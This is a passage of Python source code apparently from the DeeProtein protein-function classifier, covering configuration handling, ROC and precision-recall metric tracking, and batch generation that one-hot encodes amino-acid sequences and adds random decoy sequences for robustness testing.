= config_dict['threshold_num'] self._gpu = config_dict['gpu'] self._allowsoftplacement = config_dict['allow_softplacement'] self._numepochs = config_dict['num_epochs'] self._numsteps = config_dict['num_steps'] self._depth = config_dict['depth'] self._structuredims = config_dict['structure_dims'] self._traindata = config_dict['train_data'] self._validdata = config_dict['valid_data'] self._batchesdir = config_dict['batches_dir'] self._inferencemode = True if config_dict['inference_mode'] == 'True' else False self._labels = config_dict['labels'] self._nclasses = config_dict['n_classes'] self._classbalancing = True if config_dict['class_balancing'] == 'True' else False self._maxclassinbalance = config_dict['maxclass_inbalance'] self._dropoutrate = config_dict['dropoutrate'] self._learningrate = config_dict['learning_rate'] self._epsilon = config_dict['epsilon'] self._batchsize = config_dict['batch_size'] self._batchgenmode = config_dict['batchgen_mode'] self._windowlength = config_dict['window_length'] self._minlength = config_dict['min_length'] self._numthreads = config_dict['num_threads'] #TODO ASSERT THIS NUMBER!!!!!!!! self._restorepath = config_dict['restore_path'] self._restore = True if config_dict['restore'] == 'True' else False self._debug = True if config_dict['debug'] == 'True' else False self._ecfile = config_dict['EC_file'] self._summariesdir = config_dict['summaries_dir'] # for tensorboard self._summariesdir = self._summariesdir + \ '_{l}_{n}_{w}_{g}_{b}_{lr}_{e}'.format(g=self._batchgenmode, w=self._windowlength, n=self._nclasses, b=self._batchsize, lr=self._learningrate, e=self._epsilon, l=self._labels) if not os.path.exists(self._summariesdir): os.makedirs(self._summariesdir) if not os.path.exists(self._batchesdir): os.makedirs(self._batchesdir) def write_dict(self): """Store the config_dict on disc in the save_dir. """ with open(os.path.join(self._summariesdir, 'config_dict.JSON'), "w") as config_dict: json.dump(self.config, config_dict) class RocTracker(): """This class calculates comprehensive metrics for the validation of the performace of DeeProtein. The calculated metrics include Area under the ROC-Curve and AUC under the Precision/recall-curve. Attributes: _opts: A `helpers.OptionHandler` defining the global preferences. metrics_path: `str` the path to the metrics folder. metrics_file: `str` file to the metrics.csv where the most recent metrics are stored. roc_score: `Array` holding the logits of the model for each validation batch. roc_labels: `Array` holding the labels of the model for each validation batch. pred_positives_sum: `Array` holding the positive predictions for each class. actual_positives_sum: `Array` holding the condition positives predictions for each class. true_positives_sum: `Array` holding the true positives predictions for each class. num_calculations: `int32` as a counter. """ def __init__(self, optionhandler): self._opts = optionhandler self.metrics_path = os.path.join(self._opts._summariesdir, 'metrics') if not os.path.exists(self.metrics_path): os.mkdir(self.metrics_path) self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w") self.roc_score = [] self.roc_labels = [] self.pred_positives_sum = np.zeros(self._opts._nclasses) self.actual_positives_sum = np.zeros(self._opts._nclasses) self.true_positive_sum = np.zeros(self._opts._nclasses) self.num_calculations = 0 try: plt.style.use(json.load( open('/net/data.isilon/igem/2017/scripts/clonedDeeProtein/DeeProtein/style.json', 'r'))) self.font = font_manager.FontProperties( fname='/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff') self.monospaced = font_manager.FontProperties( fname='/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf') except: pass def update(self, sigmoid_logits, true_labels): """Update the ROC tracker, with the predictions on one batch made during validation. Args: sigmoid_logits: `np.Array` and 2D arrray holding the sigmoid logits for the validation batch. true_labels: `np.Array` and 2D arrray holding the true labels for the validation batch. """ # threshold this thing # we consider a class "predicted" if it's sigmoid activation is higher than 0.5 (predicted labels) batch_predicted_labels = np.greater(sigmoid_logits, 0.5) batch_predicted_labels = batch_predicted_labels.astype(float) batch_pred_pos = np.sum(batch_predicted_labels, axis=0) #sum up along the batch dim, keep the channels batch_actual_pos = np.sum(true_labels, axis=0) #sum up along the batch dim, keep the channels # calculate the true positives: batch_true_pos = np.sum(np.multiply(batch_predicted_labels, true_labels), axis=0) # and update the counts self.pred_positives_sum += batch_pred_pos #what the model said self.actual_positives_sum += batch_actual_pos #what the labels say self.true_positive_sum += batch_true_pos # where labels and model predictions>0.5 match assert len(self.true_positive_sum) == self._opts._nclasses # add the predictions to the roc_score tracker self.roc_score.append(sigmoid_logits) self.roc_labels.append(true_labels) def calc_and_save(self, logfile): """Calculate the ROC curve with AUC value for the collected test values (roc_scores, roc_labels). Writes everything to files, plots curves and resets the Counters afterwards. Args: logfile: `file-object` the logfile of the DeeProtein model. """ self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w") self.num_calculations += 1 # concat score and labels along the batchdim -> a giant test batch self.roc_score = np.concatenate(self.roc_score, axis=0) self.roc_labels = np.concatenate(self.roc_labels, axis=0) # get the total number of seqs we tested on: logfile.write('[*] Calculating metrics\n') test_set_size = self.roc_labels.shape[0] # do the calculations fpr, tpr, thresholds = sklearn.metrics.roc_curve(y_true=np.reshape(self.roc_labels, (-1)), y_score=np.reshape(self.roc_score, (-1))) auc = sklearn.metrics.auc(fpr, tpr) precision_arr, recall_arr, thresholds = sklearn.metrics.precision_recall_curve( y_true=np.reshape(self.roc_labels, (-1)), probas_pred=np.reshape(self.roc_score, (-1))) # write get the max, min and avg scores for each class: # determine the scores for the labels scores = self.roc_score * self.roc_labels mean_scores = np.mean(scores, axis=0) assert mean_scores.shape[0] == self._opts._nclasses max_scores = np.amax(scores, axis=0) assert max_scores.shape[0] == self._opts._nclasses min_scores = np.amin(scores, axis=0) assert min_scores.shape[0] == self._opts._nclasses self.metrics_file.write(str(mean_scores) + '\n') self.metrics_file.write(str(max_scores) + '\n') self.metrics_file.write(str(min_scores) + '\n') self.metrics_file.close() # get printable metrics (for log file): # where predPositives_sum == 0, tp_sum is also 0 precision_class = self.true_positive_sum / np.maximum(1, self.pred_positives_sum) # where actualPositives_sum == 0, tp_sum is also 0 recall_class = self.true_positive_sum / np.maximum(1, self.actual_positives_sum) precision = np.sum(self.true_positive_sum) / np.sum(self.pred_positives_sum) recall = np.sum(self.true_positive_sum) / np.sum(self.actual_positives_sum) f1 = 2*precision*recall / (precision + recall) logfile.write("[*] Tested on %d seqs, " "precision %.2f%%, " "recall %.2f%%, " "F1 %.2f%%\n" % (test_set_size, precision, recall, f1)) logfile.flush() #plot ROC: self.plot_simple_curve(x=fpr, y=tpr, title=self._opts._name + '_ROC_curve', legend=self._opts._name + ' (AUC = %0.4f)' % auc, xname='False positive rate', yname='True positive rate', filename=os.path.join(self.metrics_path, self._opts._name + '.roc_%d' % self.num_calculations)) # PR curve self.plot_simple_curve(x=recall_arr, y=precision_arr, title=self._opts._name + ' PR curve', legend=self._opts._name, xname='Recall', yname='Precision', filename=os.path.join(self.metrics_path, self._opts._name + '.precision_%d' % self.num_calculations), include_linear=False) # reset the stats-collectors: self.roc_score = [] self.roc_labels = [] self.pred_positives_sum = np.zeros(self._opts._nclasses) self.actual_positives_sum = np.zeros(self._opts._nclasses) logfile.write('[*] Done testing.\n') def plot_simple_curve(self, x, y, title, legend, xname, yname, filename, include_linear=True, iGEM_style=True): """Plots simple curve in the iGEM style if wanted. Args: x: `Array1d`, what to plot on the x-Axis. y: `Array1d` what to plot on the y-Axis. title: `str`, the title. legend:`str`, the legend. xname: `str`, the name of the x axis. yname: `str`, the name of the y axis. filename: `str`, path to the file where to save the plot. include_linear: `bool`, whether to plot a linear line with slope=1. iGEM_style: `bool`, whether to plot in the iGEM-Heidelberg style layout. """ plt.ioff() fig = plt.figure(1, figsize=(5, 5), dpi=200) plt.plot(x, y, color='#005493', lw=2, label=legend) if include_linear: plt.plot([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle="--") plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) if iGEM_style: plt.title(title, fontproperties=self.font) plt.xlabel(xname, fontproperties=self.font) plt.ylabel(yname, fontproperties=self.font) plt.legend(loc="lower right", prop=self.font) else: plt.title(title) plt.xlabel(xname) plt.ylabel(yname) plt.legend(loc="lower right") plt.savefig(filename+".svg") plt.savefig(filename+".png") plt.close(fig) def _count_lines(file_path): """Count lines in a file. A line counter. Counts the lines in given file with counter count counts. Args: file_path: `str` path to file where to count the lines. """ count = 0 with open(file_path, "r") as fobj: for line in fobj: count += 1 return count class StratifiedCounterDict(dict): def __missing__(self, key): self[key] = {'tp': 0, 'pred_p': 0, } return self[key] class BatchGenerator(): """Batchgenerator of the DeeProtein model. This Class generates the life batches for inference and holds important information such as the class_dict and the embedding_dict. It further can be used to perform tests on a model by generating batches of garbage sequences or batches of sequences for inference. Attributes: _opts: A `helpers.OptionHandler` holding the global options for the module. mode: A `str`. Has to be one of ['one_hot_padded'] inferencedata: A `fileObject` the file from which to infer. traindata: A `fileObject` the file from which to train. validdata: A `fileObject` the file from which to evaluate. AA_to_id: A `dict` mapping single letter AAs to integers. id_to_AA: A `dict` the reverse of AA_to_id. class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specifier in the config_dict. id_to_class: An `OrderedDict` the reverse class_dict. embedding_dict: An `OrderedDict` mapping sequence names to the index in the protein embedding. garbage_percentage: A `float32` defining the amount of Garbage to incorporate in the dataset. garbage_count: A `int32` used to count the nr of garbage that has been written. eval_batch_nr: A `int32`, the nr of batches needed for complete evaluation of the valid set. batches_per_file: A `int32`, defines the nr of batches that is included in a tf.Records file. epochs: A `int32` defining the nr of epochs to train. curr_epoch: A `int32` counter for the epcohs. label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels. AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters. """ def __init__(self, optionhandler): self._opts = optionhandler self.mode = self._opts._batchgenmode # one of ['window', 'bigbox', 'dynamic'] self.traindata = open(self._opts._traindata, 'r') self.validdata = open(self._opts._validdata, 'r') self.AA_to_id = {} self.id_to_AA = {} self.class_dict = OrderedDict() self.id_to_class = OrderedDict() self._get_class_dict() self.embedding_dict = OrderedDict() # determine the number of batches for eval from lines in the validdata and the garbagepercentage self.garbage_percentage = 0.2 self.garbage_count = 0 # a counter for generated garbage sequences self.eval_batch_nr = int(_count_lines(self._opts._validdata) * (1 + self.garbage_percentage) // self._opts._batchsize) print('Initialized Batchgen with batchsize: %d, numeval_batches: %d at' ' garbage_percentage: %f' % (self._opts._batchsize, self.eval_batch_nr, self.garbage_percentage)) self.batches_per_file = 10000 self.epochs = 2000 self.curr_epoch = 0 self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False) self.AA_enc = 'where we put the encoder for the AAs' if self.mode.startswith('one_hot'): AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',] self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False) if 'physchem' in self.mode: #this is to be implemented. _hydro = [1.8, 2.5, -3.5, -3.5, 2.8, -0.4, -3.2, 4.5, -3.9, 3.8, 1.9, -3.5, -1.6, -3.5, -4.5, -0.8, -0.7, 4.2, -0.9, -1.3] _molarweight = [89.094, 121.154, 133.104, 147.131, 165.192, 75.067, 155.156, 131.175, 146.189, 131.175, 149.208, 132.119, 115.132, 146.146, 174.203, 105.093, 119.119, 117.148, 204.228, 181.191] _is_polar = lambda aa: 1 if aa in ['DEHKNQRSTY'] else 0 _is_aromatic = lambda aa: 1 if aa in ['FWY'] else 0 _has_hydroxyl = lambda aa: 1 if aa in ['ST'] else 0 #should we add TYR?? _has_sulfur = lambda aa: 1 if aa in ['CM'] else 0 for i, aa in enumerate(AAs): self.AA_to_id[aa] = {'id': len(self.AA_to_id), 'hydro': _hydro[i], 'molweight': _molarweight[i], 'pol': _is_polar(aa), 'arom': _is_aromatic(aa), 'sulf': _has_sulfur(aa), 'OH': _has_hydroxyl(aa)} else: for aa in AAs: self.AA_to_id[aa] = len(self.AA_to_id) # get the inverse: self.id_to_AA = {} for aa, id in self.AA_to_id.items(): self.id_to_AA[id] = aa self.id_to_AA[42] = '_' def _get_class_dict(self): """Generate the class-dict. The class dict stores the link between the index in the one-hot encoding and the class. """ with open(self._opts._ecfile, "r") as ec_fobj: for line in ec_fobj: fields = line.strip().split() if fields[1].endswith('.csv'): fields[1] = fields[1].rstrip('.csv') if self._opts._labels == 'EC': self.class_dict[fields[1]] = {'id': len(self.class_dict), 'size': int(fields[0]), } if self._opts._labels == 'GO': self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict), 'size': int(fields[0]), } # get a reverse dict: for key in self.class_dict.keys(): self.id_to_class[self.class_dict[key]['id']] = key def _update_embedding_dict(self, name, labels): """Helper function for the DeeProtein.generate_embedding(). Update the embedding dict for new entries. This is used on the fly as we perform inference batchgen. Args: name: A `str`, name of the new token/protein labels: A `list` of strings which labels to assign to the new token """ if len(self.embedding_dict) == 0: # add UNK token the first time this method is called self.embedding_dict['UNK'] = {} self.embedding_dict['UNK']['labels'] = ['UNK'] self.embedding_dict['UNK']['id'] = 0 # we save 0 for the UNK token # check if the key (= name) is already in the dict: if name not in self.embedding_dict: assert len(self.embedding_dict) > 0 self.embedding_dict[name] = {} self.embedding_dict[name]['labels'] = labels self.embedding_dict[name]['id'] = len(self.embedding_dict) else: # get a new entry to the dict: name_matches = [k for k in self.embedding_dict.keys() if k.startswith(name)] new_name = name + str(len(name_matches)) assert len(self.embedding_dict) > 0 self.embedding_dict[new_name] = {} self.embedding_dict[new_name]['labels'] = labels self.embedding_dict[new_name]['id'] = len(self.embedding_dict) def _csv_EC_decoder(self, in_csv, encoded_labels=True): """Helper function for _process_csv(). This function takes an in csv obj and iterates over the lines. Args: in_csv: `fileobject`, the incsv file object. encoded_labels: `bool`, wheter to return one-hot encoded labels or the label as string (optional). Defaults to True. Returns: name: A `str` holding the name of the sample sequence. seq: A `str` holding the sequence. seq: A `str` holding the label(s). """ assert self.mode == 'one_hot_padded', 'mode must be one_hot_padded' line = in_csv.readline() fields = line.strip().split(';') name = fields[0] seq = fields[1] if fields[2].endswith('.csv'): #TODO assert this fields[2] = fields[2].rstrip('.csv') if self._opts._labels == 'EC': EC_str = fields[2] #TODO assert this if encoded_labels: EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id'] label = [[EC_CLASS]] # we need a 2D array else: label = EC_str elif self._opts._labels == 'GO': GO_str = fields[2] #TODO assert this GOs = 0 if self._opts._inferencemode else fields[2].split(',') #TODO assert this if encoded_labels: label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array else: label = GOs return name, seq, label def _seq2tensor(self, seq): """Helper function for _process_csv(). Takes a sequence and encodes it onehot. Args: seq: `str`, The sequence to encode Returns: padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos. length: A `Tensor` holding the length. """ if self.mode == 'one_hot_padded': # first check if the sequence fits in the box: if len(seq) <= self._opts._windowlength: seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32) # if sequence does not fit we clip it: else: seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32) for i in range(len(seq_matrix)): seq_matrix[i] = self.AA_to_id[seq[i]] start_pos = 0 #because our sequence sits at the beginning of the box length = len(seq_matrix) #true length (1 based) # now encode the sequence in one-hot oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix, (1, -1))), (len(seq_matrix), 20)) # pad the sequence to the boxsize: npad = ((0, self._opts._windowlength-length), (0, 0)) padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0) padded_seq_matrix = np.transpose(padded_seq_matrix) del oh_seq_matrix, seq_matrix return padded_seq_matrix, start_pos, length #true length 1 based else: print("Error: MODE must be of 'one_hot_padded'") def _encode_single_seq(self, seq, desired_label=None): """Encode a single sequence one-hot. This funciton is thought to be used in the inference mode. Args: seq: A `str` holding the sequence to be encoded. desired_label: A `str` holding the label to assign to this sequence (optional). Returns: oh_label: A `Tensor` holding the one_hot encoded label. This is only returned if a desired label was passed. seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos. This is only returned if a desired label was passed. length: A `Tensor` holding the length. This is only returned if a desired label was passed. """ seq_matrix, start_pos, length = self._seq2tensor(seq) # look up the label in the class_dict: if desired_label: desired_label_ID = self.class_dict[desired_label]['id'] # encode label one_hot: oh_label = self.label_enc.fit_transform([[desired_label_ID]]) # of shape [1, n_classes] return oh_label, seq_matrix, start_pos, length else: return seq_matrix def _process_csv(self, queue, return_name=True, encode_labels=True): """Iterate over a dataset.csv and process the samples. Takes the path to a file and processes the samples a sample at a time whenever the function is called. Args: queue: `str` the file_path to the dataset.csv. The csv file should be in the form of: name,seq,labels. return_name: `bool` whether to return the sequence name or not. Defaults to True. encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True. Returns: Depending on return_name either (if true): name: A `str` holding the sample name. label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0). end_pos: A `Tensor` holding the end pos of the sequence in the window. OR label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0). end_pos: A `Tensor` holding the end pos of the sequence in the window. """ name, seq, label = self._csv_EC_decoder(queue, encoded_labels=encode_labels) seq_matrix, start_pos, end_pos = self._seq2tensor(seq) if return_name: return name, label, seq_matrix, start_pos, end_pos else: return label, seq_matrix, start_pos, end_pos def generate_garbage_sequence(self, return_name=False): """Generate a garbage sequence. Generates a sequence full of garbage, e.g. a obviously non functional sequence. Used to test the robustness of the model precision. Args: return_name: A `bool`, if True return the garbage sequene along wih a generated name. Returns: name: A `str` holding the sample name (if return_name is True). padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence. label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). The labels of a garbage sequence are a zeros Tensor. garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence). """ modes = ['complete_random', 'pattern', 'same'] mode = modes[random.randint(0, 2)] self.garbage_count += 1 # get the length of the protein length = random.randint(175, self._opts._windowlength-10) #enforce padding if mode == 'pattern': #print('pattern') # Generate a repetitive pattern of 5 AminoAcids to generate the prot # get a random nr of AAs to generate the pattern: AA_nr = random.randint(2, 5) # get an index for each AA in AA_nr idxs = [] for aa in range(AA_nr): idx_found = False while not idx_found: aa_idx = random.randint(0, 19) if not aa_idx in idxs: idxs.append(aa_idx) idx_found = True reps = math.ceil(length/AA_nr) seq = reps * idxs length = len(seq) elif mode == 'complete_random': # print('complete_random') seq = [] for aa in range(length): # get an idx for every pos in length: idx = random.randint(0, 19) seq.append(idx) elif mode == 'same': # print('ONE') AA = random.randint(0, 19) seq = length * [AA] label = np.zeros([self._opts._nclasses]) label = np.expand_dims(label, axis=0) garbage_label = np.asarray([1]) garbage_label = np.expand_dims(garbage_label, axis=0) oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20)) # pad the sequence to the boxsize: npad = ((0, self._opts._windowlength-length), (0, 0)) padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0) padded_seq = np.transpose(padded_seq_matrix) if return_name: # return a sequence ID to identify the generated sequence # generate a "random" name name = 'g%d' % self.garbage_count return name, padded_seq, label, garbage_label else: return padded_seq, label, garbage_label def generate_random_data_batch(self): """Generates a batch consisting solely of random data. Generate a batch full of random data drawn form a normal distribution. Returns: seq_tensor_batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the random data batch. onehot_labelled_batch: A `Tensor`, [batchsize, n_classes] holding the random labels. """ seq_tensor_batch = tf.random_normal([self._opts._batchsize, self._opts._embeddingdim, self._opts._windowlength, 1]) label_batch = [np.random.randint(1,self._opts._nclasses) for _ in range(self._opts._batchsize)] index_batch = [tf.constant(label) for label in label_batch] label_tensor = tf.stack(index_batch) onehot_labelled_batch = tf.one_hot(indices=tf.cast(label_tensor, tf.int32), depth=self._opts._nclasses) return seq_tensor_batch, onehot_labelled_batch def generate_batch(self, is_train): """Generate a batch for the feed_dict pipeline. This function is depracted. Please use the input pipeline along with the TFrecordsgenrator training sequence input. Args: is_train: A `bool` from which dataset (train/valid) to draw the samples. Returns: batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the inference data batch. label_batch: A `Tensor`, [batchsize, n_classes] holding the labels. positions: A `Tensor` [batchsize, start, end], where the start/end position of a sequence is. """ seq_tensors = [] label_batch = [] positions = np.ndarray([self._opts._batchsize, 2]) lengths = np.ndarray([self._opts._batchsize]) if is_train: in_csv = self.traindata else: in_csv = self.validdata for i in range(self._opts._batchsize): try: """ Note that this is not shuffled! """ ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False, encode_labels=True) label_batch.append(ECclass) seq_tensors.append(seq_tensor) except IndexError: # catches error from csv_decoder # reopen the file: in_csv.close() # TODO: implement file shuffling when we reopen the file if is_train: self.traindata = open(self._opts._traindata, 'r') in_csv = self.traindata else: self.validdata = open(self._opts._validdata, 'r') in_csv = self.validdata """ redo """ ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False, encode_labels=True) label_batch.append(ECclass) seq_tensors.append(seq_tensor) positions[i, 0] = start_pos positions[i, 1] = end_pos lengths[i] = end_pos batch = np.stack(seq_tensors, axis=0) return batch, label_batch, positions def generate_binary_batch(self): """Generate a binary batch for training protein activity. This function requires a special input dataset, where the labels are already encoded as their target float. Thus this function does NOT use the GO-file nor the examples dumps. Labels should be encoded from 0 (no activity) over 0.5 (first active bin) to 1. (maximum activity). Returns: batch: A np.ndarray holding the batch labels: A np.ndarray holding the labels """ seq_tensors = [] labels = [] in_csv = self.traindata for i in range(self._opts._batchsize): try: """ Note that this is not shuffled! """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) seq_tensors.append(seq_tensor) labels.append(label) except IndexError: # catches error from csv_decoder # reopen the file: in_csv.close() # TODO: implement file shuffling when we reopen the file self.traindata = open(self._opts._traindata, 'r') in_csv = self.traindata """ redo """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) seq_tensors.append(seq_tensor) labels.append(label) # encode the labels "one-hot" although not really one hot, but rather with the passed score labels_tensor = [] for i in labels: labels_tensor = [np.float32(l) for l in labels] del labels labels = np.stack(labels_tensor, axis=0) # [b, 1] #print(labels.shape) batch = np.stack(seq_tensors, axis=0) batch = np.expand_dims(batch, axis=-1) # [b, aa, w, 1] return batch, labels def generate_valid_batch(self, include_garbage=False): """Generate a batch of sequences form the valid set for inference. Draws samples from the valid set and generates a batch to infer the labels. As everything is fed into the same graph, we use the same kind of preprocessing as in generate_batch(). This function is also used in the DeeProtein.generate_embedding(). Args: include_garbage: A `bool`, if True, include garbage sequences into the valid batch (optional). Defaults to False Returns: batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the sequences batch. """ seq_tensors = [] in_csv = self.validdata if not include_garbage: for i in range(self._opts._batchsize): try: """ Note that this is not shuffled! """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) self._update_embedding_dict(name, label) seq_tensors.append(seq_tensor) except IndexError: # catches error from csv_decoder # reopen the file: in_csv.close() # TODO: implement file shuffling when we reopen the file self.validdata = open(self._opts._validdata, 'r') in_csv = self.validdata """ redo """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) self._update_embedding_dict(name, label) seq_tensors.append(seq_tensor) # elif include_garbage: num_garbage = math.ceil(self._opts._batchsize * self.garbage_percentage) for i in range(self._opts._batchsize - num_garbage): try: """ Note that this is not shuffled! """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) self._update_embedding_dict(name, label) seq_tensors.append(seq_tensor) except IndexError: # catches error from csv_decoder # reopen the file: in_csv.close() # TODO: implement file shuffling when we reopen the file self.validdata = open(self._opts._validdata, 'r') in_csv = self.validdata """ redo """ name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True, encode_labels=False) self._update_embedding_dict(name, label) seq_tensors.append(seq_tensor) for i in range(num_garbage): name, seq_tensor, _, _ = self.generate_garbage_sequence(return_name=True) label = 'garbage' self._update_embedding_dict(name, label) seq_tensors.append(seq_tensor) batch = np.stack(seq_tensors, axis=0) batch = np.expand_dims(batch, axis=-1) return batch class TFrecords_generator(): """TFrecords_generator of the DeeProtein model. This class takes a splitted dataset (train, valid) and generates examples files as tf.Records files. This file format is required to train the model from the DeeProtein inputpipeline. Attributes: _opts: A `helpers.OptionHandler` holding the global options for the module. label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels. AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters. mode: A `str`. Has to be one of ['one_hot_padded'] traindata: A `fileObject` the file from which to train. validdata: A `fileObject` the file from which to evaluate. AA_to_id: A `dict` mapping single letter AAs to integers. class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specifier in the config_dict. structure_dict: An `dict` mapping the structural information to an int. examples_per_file: A `int32`, defines the nr of sampels that is included in a tf.Records file. epochs: A `int32` defining the nr of epochs to train. curr_epoch: A `int32` counter for the epcohs. writer: A `fileObj` in which to write the log messages. """ def __init__(self, optionhandler): self._opts = optionhandler self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False) self.AA_enc = 'where we put the encoder for the AAs' self.mode = self._opts._batchgenmode # one of ['window', 'bigbox', 'dynamic'] self.traindata = open(self._opts._traindata, 'r') self.validdata = open(self._opts._validdata, 'r') self.AA_to_id = {} self.class_dict = {} self._get_class_dict() self.structure_dict = {} self.examples_per_file = 10000 self.epochs = self._opts._numepochs self.curr_epoch = 0 self.writer = 'where we put the writer' # get the structure_dict structure_forms = ['UNORDERED', 'HELIX', 'STRAND', 'TURN'] assert len(structure_forms) == self._opts._structuredims-1 for s in structure_forms: self.structure_dict[s] = len(self.structure_dict) + 1 #serve the 0 for NO INFORMATION if self.mode.startswith('one_hot'): AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',] #'X'] self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False) if 'physchem' in self.mode: _hydro = [1.8, 2.5, -3.5, -3.5, 2.8, -0.4, -3.2, 4.5, -3.9, 3.8, 1.9, -3.5, -1.6, -3.5, -4.5, -0.8, -0.7, 4.2, -0.9, -1.3] _molarweight = [89.094, 121.154, 133.104, 147.131, 165.192, 75.067, 155.156, 131.175, 146.189, 131.175, 149.208, 132.119, 115.132, 146.146, 174.203, 105.093, 119.119, 117.148, 204.228, 181.191] _is_polar = lambda aa: 1 if aa in ['DEHKNQRSTY'] else 0 _is_aromatic = lambda aa: 1 if aa in ['FWY'] else 0 _has_hydroxyl = lambda aa: 1 if aa in ['ST'] else 0 #should we add TYR?? _has_sulfur = lambda aa: 1 if aa in ['CM'] else 0 for i, aa in enumerate(AAs): self.AA_to_id[aa] = {'id': len(self.AA_to_id), 'hydro': _hydro[i], 'molweight': _molarweight[i], 'pol': _is_polar(aa), 'arom': _is_aromatic(aa), 'sulf': _has_sulfur(aa), 'OH': _has_hydroxyl(aa)} else: for aa in AAs: self.AA_to_id[aa] = len(self.AA_to_id) # get the inverse: self.id_to_AA = {} for aa, id in self.AA_to_id.items(): self.id_to_AA[id] = aa self.id_to_AA[42] = '_' def _get_class_dict(self): """ This function generates the class-dict. The class dict stores the link between the index in the one-hot encoding and the class. """ with open(self._opts._ecfile, "r") as ec_fobj: for line in ec_fobj: fields = line.strip().split() if fields[1].endswith('.csv'): #TODO delete this when error is fixed fields[1] = fields[1].rstrip('.csv') if self._opts._labels == 'EC': self.class_dict[fields[1]] = {'id': len(self.class_dict), 'size': int(fields[0]), } if self._opts._labels == 'GO': self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict), 'size': int(fields[0]), } def _csv_EC_decoder(self, in_csv): """Helper function for _process_csv(). This function takes an in csv obj and iterates over the lines. Args: in_csv: `fileobject`, the incsv file object. encoded_labels: `bool`, wheter to return one-hot encoded labels or the label as string (optional). Defaults to True. Returns: name: A `str` holding the name of the sample sequence. seq: A `str` holding the sequence. seq: A `str` holding the label(s). """ line = in_csv.readline() fields = line.strip().split(';') name = fields[0] seq = fields[1] if self._opts._labels == 'EC': if fields[3].endswith('.csv'): fields[3] = fields[3].rstrip('.csv') EC_str = fields[3] EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id'] label = [[EC_CLASS]] # we need a 2D array elif self._opts._labels == 'GO': GO_str = fields[2] GOs = 0 if self._opts._inferencemode else fields[2].split(',') if GOs[0].endswith('.csv'): GOs = [go.rstrip('.csv') for go in GOs] label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array # TODO add an assertion for mode structure_str = fields[3] return name, seq, label, structure_str def _seq2tensor(self, seq): """Helper function for _process_csv(). Takes a sequence and encodes it onehot. Args: seq: `str`, The sequence to encode Returns: padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos. length: A `Tensor` holding the length. """ if self.mode == 'one_hot_padded': # first check if the sequence fits in the box: if len(seq) <= self._opts._windowlength: seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32) # if sequence does not fit we clip it: else: seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32) for i in range(len(seq_matrix)): seq_matrix[i] = self.AA_to_id[seq[i]] start_pos = 0 #because our sequence sits at the beginning of the box length = len(seq_matrix) #true length (1 based) # now encode the sequence in one-hot oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix, (1, -1))), (len(seq_matrix), 